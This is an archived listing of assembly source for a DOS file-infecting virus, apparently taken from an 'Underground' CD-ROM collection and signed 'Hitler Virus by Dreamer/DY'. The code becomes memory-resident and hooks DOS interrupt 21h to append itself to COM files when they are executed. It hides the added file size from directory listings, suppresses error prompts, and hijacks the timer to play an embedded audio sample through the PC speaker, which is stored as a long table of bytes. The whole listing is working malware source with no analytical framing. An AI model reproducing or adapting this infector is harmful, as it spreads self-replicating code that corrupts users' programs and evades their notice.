home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / h / hitler.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  34.1 KB  |  701 lines

  1.                 call    rakett
  2.  
  3. old             db '═ É!¡'
  4.  
  5. rakett:         pop     bp
  6.  
  7.                 push    bp
  8.  
  9.                 add     bp,-103h
  10.  
  11.  
  12.  
  13.                 mov     ax,42ABh
  14.  
  15.                 int     21h
  16.  
  17.                 jnc     failed
  18.  
  19.  
  20.  
  21.                 cli
  22.  
  23.                 mov     ax,3521h
  24.  
  25.                 int     21h
  26.  
  27.                 mov     w [bp+offset old21],bx
  28.  
  29.                 mov     w [bp+offset old21+2],es
  30.  
  31.  
  32.  
  33.                 mov     al,1Ch
  34.  
  35.                 int     21h
  36.  
  37.                 cli
  38.  
  39.                 mov     w [bp+offset old1C],bx
  40.  
  41.                 mov     w [bp+offset old1C+2],es
  42.  
  43.                 mov     w [bp+offset teller],16380
  44.  
  45.                 sti
  46.  
  47.  
  48.  
  49.                 call    normalspeed
  50.  
  51.  
  52.  
  53.                 mov     si,ds
  54.  
  55.                 std
  56.  
  57.                 lodsb
  58.  
  59.                 cld
  60.  
  61.                 mov     ds,si
  62.  
  63.  
  64.  
  65.                 xor     bx,bx
  66.  
  67.                 mov     cx,pgf
  68.  
  69.                 cmp     b [bx],'Z'
  70.  
  71.                 jne     failed
  72.  
  73.                 mov     ax,[bx+3]
  74.  
  75.                 sub     ax,cx
  76.  
  77.                 jc      failed
  78.  
  79.                 mov     [bx+3],ax
  80.  
  81.                 sub     [bx+12h],cx
  82.  
  83.                 mov     es,[bx+12h]
  84.  
  85.  
  86.  
  87.                 push    cs
  88.  
  89.                 pop     ds
  90.  
  91.  
  92.  
  93.                 mov     di,100h
  94.  
  95.                 mov     si,bp
  96.  
  97.                 add     si,di
  98.  
  99.                 mov     cx,size
  100.  
  101.                 rep     movsb
  102.  
  103.  
  104.  
  105.                 push    es
  106.  
  107.                 pop     ds
  108.  
  109.                 mov     ax,2521h
  110.  
  111.                 mov     dx,offset ni21
  112.  
  113.                 int     21h
  114.  
  115.                 mov     al,1Ch
  116.  
  117.                 mov     dx,offset ni1C
  118.  
  119.                 int     21h
  120.  
  121.  
  122.  
  123. failed:         push    cs
  124.  
  125.                 push    cs
  126.  
  127.                 pop     ds
  128.  
  129.                 pop     es
  130.  
  131.  
  132.  
  133.                 pop     si
  134.  
  135.                 mov     di,100h
  136.  
  137.                 push    di
  138.  
  139.                 movsw
  140.  
  141.                 movsw
  142.  
  143.                 movsb
  144.  
  145.  
  146.  
  147.                 mov     cx,0FFh
  148.  
  149.                 mov     si,100h
  150.  
  151.                 ret
  152.  
  153.  
  154.  
  155.  
  156.  
  157. findFCB:        popf
  158.  
  159.                 call    int21
  160.  
  161.                 pushf
  162.  
  163.                 or      al,al
  164.  
  165.                 jnz     backFCB
  166.  
  167.                 call    stealth
  168.  
  169. backFCB:        popf
  170.  
  171.                 iret
  172.  
  173.  
  174.  
  175. stealth:        push    ax
  176.  
  177.                 push    bx
  178.  
  179.                 push    dx
  180.  
  181.                 push    es
  182.  
  183.  
  184.  
  185.                 mov     ah,2Fh
  186.  
  187.                 call    int21
  188.  
  189.  
  190.  
  191.                 cmp     byte es:[bx],0FFh
  192.  
  193.                 jne     normFCB
  194.  
  195.                 add     bx,8
  196.  
  197. normFCB:        mov     al,byte es:[bx+16h]
  198.  
  199.                 and     al,31
  200.  
  201.                 xor     al,31
  202.  
  203.                 jnz     shitFCB
  204.  
  205.                 mov     ax,word es:[bx+1Ch]
  206.  
  207.                 mov     dx,word es:[bx+1Ch+2]
  208.  
  209.                 sub     ax,size
  210.  
  211.                 sbb     dx,0
  212.  
  213.                 jc      shitFCB
  214.  
  215.                 mov     word es:[bx+1Ch],ax
  216.  
  217.                 mov     word es:[bx+1Ch+2],dx
  218.  
  219. shitFCB:
  220.  
  221.                 pop     es
  222.  
  223.                 pop     dx
  224.  
  225.                 pop     bx
  226.  
  227.                 pop     ax
  228.  
  229.                 ret
  230.  
  231.  
  232.  
  233. ni21:           pushf
  234.  
  235.                 cmp     ah,11h
  236.  
  237.                 je      findFCB
  238.  
  239.                 cmp     ah,12h
  240.  
  241.                 je      findFCB
  242.  
  243.  
  244.  
  245.                 cmp     ax,42ABh
  246.  
  247.                 jne     not_42AB
  248.  
  249.                 popf
  250.  
  251.                 clc
  252.  
  253.                 retf    2
  254.  
  255. not_42AB:
  256.  
  257.                 cmp     ax,4B00h
  258.  
  259.                 jne     not_4B00
  260.  
  261.  
  262.  
  263. call    install_24
  264.  
  265.  
  266.  
  267.                 push    ax
  268.  
  269.                 push    bx
  270.  
  271.                 push    cx
  272.  
  273.                 push    dx
  274.  
  275.                 push    ds
  276.  
  277.                 push    bp
  278.  
  279.  
  280.  
  281.                 mov     ax,4300h
  282.  
  283.                 call    int21
  284.  
  285.                 jc      back1
  286.  
  287.                 mov     cs:old_attr,cx
  288.  
  289.  
  290.  
  291.                 test    cl,4
  292.  
  293.                 jnz     back1
  294.  
  295.  
  296.  
  297.                 mov     ax,4301h
  298.  
  299.                 xor     cx,cx
  300.  
  301.                 call    int21
  302.  
  303.                 jc      back1
  304.  
  305.  
  306.  
  307.                 push    dx
  308.  
  309.                 push    ds
  310.  
  311.                 call    infect
  312.  
  313.                 pop     ds
  314.  
  315.                 pop     dx
  316.  
  317.  
  318.  
  319.                 mov     ax,4301h
  320.  
  321. db              0B9h    ;mov CX,...
  322.  
  323. old_attr        dw 0
  324.  
  325.                 call    int21
  326.  
  327.  
  328.  
  329. back1:          ;go here if the attrib-get fails
  330.  
  331.                 pop     bp
  332.  
  333.                 pop     ds
  334.  
  335.                 pop     dx
  336.  
  337.                 pop     cx
  338.  
  339.                 pop     bx
  340.  
  341.                 pop     ax
  342.  
  343.  
  344.  
  345. call    remove_24
  346.  
  347.  
  348.  
  349. not_4B00:
  350.  
  351. back:           popf
  352.  
  353.                 db 0EAh
  354.  
  355. old21           dw 0,0
  356.  
  357.  
  358.  
  359. int21:          pushf
  360.  
  361.                 call    dword ptr cs:old21
  362.  
  363.                 ret
  364.  
  365.  
  366.  
  367. infect:         mov     ax,3D02h
  368.  
  369.                 call    int21
  370.  
  371.                 jnc     okay_open
  372.  
  373. bad1:           ret
  374.  
  375. okay_open:      xchg    bx,ax
  376.  
  377.                 mov     ax,5700h
  378.  
  379.                 call    int21
  380.  
  381.                 push    cx
  382.  
  383.                 mov     bp,sp
  384.  
  385.                 push    dx
  386.  
  387.  
  388.  
  389.                 mov     ah,3Fh
  390.  
  391.                 mov     cx,5
  392.  
  393.                 mov     dx,offset old
  394.  
  395.                 push    cs
  396.  
  397.                 pop     ds
  398.  
  399.                 call    int21
  400.  
  401.                 jc      close
  402.  
  403.                 cmp     al,5
  404.  
  405.                 jne     close
  406.  
  407.  
  408.  
  409.                 cmp     word old[0],'MZ'
  410.  
  411.                 je      close
  412.  
  413.                 cmp     word old[0],'ZM'
  414.  
  415.                 je      close
  416.  
  417.                 cmp     old[0],0E9h
  418.  
  419.                 jne     infect1
  420.  
  421.                 cmp     word old[3],'¡!'
  422.  
  423.                 jne     infect1
  424.  
  425.  
  426.  
  427. close:          pop     dx
  428.  
  429.                 pop     cx
  430.  
  431.                 mov     ax,5701h
  432.  
  433.                 call    int21
  434.  
  435.                 mov     ah,3Eh
  436.  
  437.                 call    int21
  438.  
  439.                 ret
  440.  
  441.  
  442.  
  443. infect1:        mov     ax,4202h
  444.  
  445.                 xor     cx,cx
  446.  
  447.                 xor     dx,dx
  448.  
  449.                 call    int21
  450.  
  451.  
  452.  
  453.                 or      dx,dx
  454.  
  455.                 jnz     close
  456.  
  457.                 cmp     ax,59000
  458.  
  459.                 jae     close
  460.  
  461.  
  462.  
  463.                 dec     ax
  464.  
  465.                 dec     ax
  466.  
  467.                 dec     ax
  468.  
  469.  
  470.  
  471.                 mov     word ptr putjmp[1],ax
  472.  
  473.  
  474.  
  475.                 mov     ah,40h
  476.  
  477.                 mov     cx,size
  478.  
  479.                 mov     dx,100h
  480.  
  481.                 call    int21
  482.  
  483.                 jc      close
  484.  
  485.                 cmp     ax,size
  486.  
  487.                 jne     close
  488.  
  489.  
  490.  
  491.                 mov     ax,4200h
  492.  
  493.                 xor     cx,cx
  494.  
  495.                 xor     dx,dx
  496.  
  497.                 call    int21
  498.  
  499.  
  500.  
  501.                 mov     ah,40h
  502.  
  503.                 mov     cx,5
  504.  
  505.                 mov     dx,offset putjmp
  506.  
  507.                 call    int21
  508.  
  509.  
  510.  
  511.                 or      byte ss:[bp],31
  512.  
  513.  
  514.  
  515.                 jmp     close
  516.  
  517.  
  518.  
  519. putjmp          db 0E9h
  520.  
  521.                 dw 0
  522.  
  523.                 db '!¡'
  524.  
  525.  
  526.  
  527. install_24:     pushf
  528.  
  529.                 cli
  530.  
  531.                 push    bx
  532.  
  533.                 push    ds
  534.  
  535.                 xor     bx,bx
  536.  
  537.                 mov     ds,bx
  538.  
  539.                 push    ds
  540.  
  541.                 lds     bx,[24h*4]
  542.  
  543.                 mov     cs:old24[0],bx
  544.  
  545.                 mov     cs:old24[2],ds
  546.  
  547.                 pop     ds
  548.  
  549.                 mov     word [(24h*4)],offset ni24
  550.  
  551.                 mov     [(24h*4)+2],cs
  552.  
  553.                 pop     ds
  554.  
  555.                 pop     bx
  556.  
  557.                 sti
  558.  
  559.                 popf
  560.  
  561.                 ret
  562.  
  563.  
  564.  
  565. remove_24:      pushf
  566.  
  567.                 cli
  568.  
  569.                 push    bx
  570.  
  571.                 push    es
  572.  
  573.                 push    ds
  574.  
  575.                 xor     bx,bx
  576.  
  577.                 mov     ds,bx
  578.  
  579.                 les     bx,cs:old24[0]
  580.  
  581.  
  582.  
  583.                 mov     [(24h*4)],bx
  584.  
  585.                 mov     [(24h*4)+2],es
  586.  
  587.  
  588.  
  589.                 pop     ds
  590.  
  591.                 pop     es
  592.  
  593.                 pop     bx
  594.  
  595.                 sti
  596.  
  597.                 popf
  598.  
  599.                 ret
  600.  
  601.  
  602.  
  603. errflag         db 0
  604.  
  605.  
  606.  
  607. db 'Hitler Virus by Dreamer/DY',0
  608.  
  609.  
  610.  
  611. ni24:           mov     al,3
  612.  
  613.                 mov     cs:errflag,1
  614.  
  615.                 iret
  616.  
  617.  
  618.  
  619. old24           dw      0,0
  620.  
  621.  
  622.  
  623. xofs            dw offset sample
  624.  
  625. len             equ 4131
  626.  
  627. divisor         equ 230
  628.  
  629. teller          dw 16380
  630.  
  631.  
  632.  
  633. ni1C:
  634.  
  635.                 cli
  636.  
  637.                 pushf
  638.  
  639.                 push    ax
  640.  
  641.                 push    ds
  642.  
  643.                 push    si
  644.  
  645.  
  646.  
  647.                 push    cs
  648.  
  649.                 pop     ds
  650.  
  651.  
  652.  
  653.                 cmp     teller,0
  654.  
  655.                 je      teller_ok
  656.  
  657.                 dec     teller
  658.  
  659.                 jmp     noreset
  660.  
  661. teller_ok:
  662.  
  663.                 mov     al,34h
  664.  
  665.                 db      0E6h,43h        ;out 43h,al
  666.  
  667.                 mov     al,divisor
  668.  
  669.                 db      0E6h,40h        ;out 40h,al
  670.  
  671.                 mov     al,0
  672.  
  673.                 db      0E6h,40h        ;out 40h,al
  674.  
  675.  
  676.  
  677.                 mov     al,090h
  678.  
  679.                 db      0E6h,43h        ;out 43h,al
  680.  
  681.                 mov     si,xofs
  682.  
  683.                 lodsb
  684.  
  685.                 db      0E6h,42h        ;out 42h,al
  686.  
  687.  
  688.  
  689.                 db      0E4h,61h        ;in al,61h
  690.  
  691.                 or      al,3
  692.  
  693.                 db      0E6h,61h        ;out al,61h
  694.  
  695.  
  696.  
  697.                 inc     xofs
  698.  
  699.                 cmp     xofs,len+offset sample
  700.  
  701.                 jb      noreset
  702.  
  703.                 mov     xofs,offset sample
  704.  
  705. noreset:
  706.  
  707.                 sti
  708.  
  709.                 pop     si
  710.  
  711.                 pop     ds
  712.  
  713.                 pop     ax
  714.  
  715.                 popf
  716.  
  717.  
  718.  
  719.                 db      0EAh
  720.  
  721. old1C           dw      0,0
  722.  
  723.  
  724.  
  725. normalspeed:    cli
  726.  
  727.                 push    ax
  728.  
  729.                 mov     al,34h
  730.  
  731.                 db      0E6h,43h
  732.  
  733.                 mov     al,0
  734.  
  735.                 db      0E6h,40h
  736.  
  737.                 db      0E6h,40h
  738.  
  739.                 pop     ax
  740.  
  741.                 sti
  742.  
  743.                 ret
  744.  
  745.  
  746.  
  747. sample:
  748.  
  749.  
  750.  
  751.  
  752.  
  753.  
  754.  
  755.  
  756.  
  757.         db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
  758.  
  759.         db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
  760.  
  761.         db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
  762.  
  763.         db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
  764.  
  765.         db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
  766.  
  767.         db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
  768.  
  769.         db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
  770.  
  771.         db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
  772.  
  773.         db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
  774.  
  775.         db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
  776.  
  777.         db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
  778.  
  779.         db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
  780.  
  781.         db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
  782.  
  783.         db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
  784.  
  785.         db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
  786.  
  787.         db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
  788.  
  789.         db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
  790.  
  791.         db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
  792.  
  793.         db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
  794.  
  795.         db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
  796.  
  797.         db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
  798.  
  799.         db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
  800.  
  801.         db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
  802.  
  803.         db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
  804.  
  805.         db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
  806.  
  807.         db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
  808.  
  809.         db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
  810.  
  811.         db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
  812.  
  813.         db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
  814.  
  815.         db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
  816.  
  817.         db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
  818.  
  819.         db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
  820.  
  821.         db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
  822.  
  823.         db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
  824.  
  825.         db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
  826.  
  827.         db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
  828.  
  829.         db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
  830.  
  831.         db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
  832.  
  833.         db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
  834.  
  835.         db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
  836.  
  837.         db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
  838.  
  839.         db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
  840.  
  841.         db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
  842.  
  843.         db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
  844.  
  845.         db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
  846.  
  847.         db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
  848.  
  849.         db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
  850.  
  851.         db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
  852.  
  853.         db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
  854.  
  855.         db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
  856.  
  857.         db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
  858.  
  859.         db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
  860.  
  861.         db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
  862.  
  863.         db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
  864.  
  865.         db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
  866.  
  867.         db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
  868.  
  869.         db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
  870.  
  871.         db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
  872.  
  873.         db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
  874.  
  875.         db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
  876.  
  877.         db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
  878.  
  879.         db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
  880.  
  881.         db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
  882.  
  883.         db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
  884.  
  885.         db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
  886.  
  887.         db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
  888.  
  889.         db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
  890.  
  891.         db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
  892.  
  893.         db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
  894.  
  895.         db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
  896.  
  897.         db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
  898.  
  899.         db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
  900.  
  901.         db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
  902.  
  903.         db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
  904.  
  905.         db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
  906.  
  907.         db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
  908.  
  909.         db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
  910.  
  911.         db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
  912.  
  913.         db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
  914.  
  915.         db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
  916.  
  917.         db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
  918.  
  919.         db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
  920.  
  921.         db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
  922.  
  923.         db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
  924.  
  925.         db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
  926.  
  927.         db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
  928.  
  929.         db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
  930.  
  931.         db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
  932.  
  933.         db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
  934.  
  935.         db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
  936.  
  937.         db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
  938.  
  939.         db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
  940.  
  941.         db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
  942.  
  943.         db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
  944.  
  945.         db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
  946.  
  947.         db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
  948.  
  949.         db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
  950.  
  951.         db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
  952.  
  953.         db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
  954.  
  955.         db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
  956.  
  957.         db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
  958.  
  959.         db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
  960.  
  961.         db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
  962.  
  963.         db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
  964.  
  965.         db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
  966.  
  967.         db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
  968.  
  969.         db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
  970.  
  971.         db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
  972.  
  973.         db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
  974.  
  975.         db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
  976.  
  977.         db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
  978.  
  979.         db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
  980.  
  981.         db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
  982.  
  983.         db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
  984.  
  985.         db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
  986.  
  987.         db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
  988.  
  989.         db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
  990.  
  991.         db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
  992.  
  993.         db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
  994.  
  995.         db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
  996.  
  997.         db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
  998.  
  999.         db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
  1000.  
  1001.         db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
  1002.  
  1003.         db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
  1004.  
  1005.         db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
  1006.  
  1007.         db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
  1008.  
  1009.         db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
  1010.  
  1011.         db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
  1012.  
  1013.         db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
  1014.  
  1015.         db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
  1016.  
  1017.         db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
  1018.  
  1019.         db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
  1020.  
  1021.         db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
  1022.  
  1023.         db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
  1024.  
  1025.         db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
  1026.  
  1027.         db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
  1028.  
  1029.         db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
  1030.  
  1031.         db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
  1032.  
